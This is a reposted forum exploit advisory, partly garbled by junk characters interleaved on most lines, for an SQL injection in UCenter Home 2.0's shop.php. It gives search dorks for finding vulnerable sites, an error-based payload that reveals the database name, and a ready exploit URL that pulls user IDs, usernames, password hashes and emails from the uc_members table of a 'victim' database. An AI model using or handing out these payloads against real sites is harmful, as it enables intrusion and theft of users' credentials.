+ ?6 [ o' w; o0 j. m
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
* m' K; o. ^* o7 d8 `" [7 @" L. }6 h" U# ?+ {
g0 p. q) u+ G, j$ z, p
& f9 H; D$ ?/ o% Z*/ Author : KnocKout * A# b9 i T t: P \; p% h
. G- x8 S( Q5 |2 [- `
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
/ p9 s9 D" k+ y; u h+ N0 y X, N- m/ V% g8 ?6 y2 w$ o7 `+ \6 O
*/ Contact: knockoutr@msn.com
$ ~3 H |$ U- `0 V6 A: \6 g, [4 ~9 {' z
*/ Cyber-Warrior.org/CWKnocKout
1 `) e/ v3 e$ |; p* a4 p' w6 @5 j+ C/ S0 }# P+ k+ x
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
( ~; ~2 g4 l1 J4 w* }
O* l- j& b ^7 VScript : UCenter Home 3 I9 B6 X' ], _0 V
9 J6 b$ f' k1 {8 KVersion : 2.0
/ V0 j* ]% P; K& U- m# w& x4 g. o4 U9 B
Script HomePage : http://u.discuz.net/ ' Q6 t3 }4 ^+ t6 x
+ O/ H" ~2 [1 M& v, q3 E
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
& t! d8 c. [! m3 e2 \0 L( h* S7 e6 w* r
Dork : Powered by UCenter inurl:shop.php?ac=view 5 E4 N! ^0 j6 L3 w
. [0 Z6 p0 N) u5 A
Dork 2 : inurl:shop.php?ac=view&shopid=
7 ]6 N1 e5 j7 I
$ j# ^$ T( ?6 w6 k# h__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== $ t5 ]/ ?) w* E' c2 {5 p
+ z" q3 R0 _ \5 T5 a) Q0 {7 n" j; fVuln file : Shop.php
. r9 G- x+ ~1 U: \
' _5 r2 c }( L6 D' `# vvalue's : (?)ac=view&shopid= 7 \( r* w: j1 y* K% \9 S( l% h
' c0 F. f Q' t; H8 cVulnerable Style : SQL Injection (MySQL Error Based) 8 V& ?! @4 E; N: e7 e- f
1 ]* J4 g" @7 ]Need Metarials : Hex Conversion
8 P8 S/ y/ J( {( z7 j6 S" ?& U4 V
6 E& F5 E, b: w# G__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
C8 N7 j9 m6 Q3 R% ]& l! B/ x/ J, i8 v
( ~4 q1 \ ?- W. q( H' m. n2 pYour Need victim Database name.
7 E' `2 i1 M0 Y) B7 w+ F( R5 u
+ G6 q8 e2 E# Z9 y5 g3 Z% |for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
. n- J+ N% ]3 A1 C. C+ e4 Q: |- {+ D4 K/ V
.. & y5 Y. a6 U. e0 B7 N1 X% p
2 w0 M$ z) @1 O4 ODB : Okey.
9 f; c& @ [# U$ _* y9 P! b+ X9 A7 K' G' @
your edit DB `[TARGET DB NAME]` - e" m" m2 q' x4 e& ~9 Z/ y
, P" X4 ^0 f7 ]; XExample : 'hiwir1_ucenter' $ J( y" w. x, y1 `/ H: G8 P$ _0 h$ t
( d; h, O5 v4 e! i$ G. o
Edit : Okey. 7 l# O# E1 r( |5 U5 K6 h
1 V. L9 B! C" c+ P- x$ z
Your use Hex conversion. And edit Your SQL Injection Exploit..
% |' M+ A! ], W: D- d/ `8 F2 }& y; }6 q" _1 g% m2 `: a& a) u
p, v2 r1 N- p1 n
9 e3 k5 p% F5 ^& x9 H
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 7 K7 F) I& O2 i" L/ E
|
发表于 2013-2-27 21:31:31
收藏
支持
反对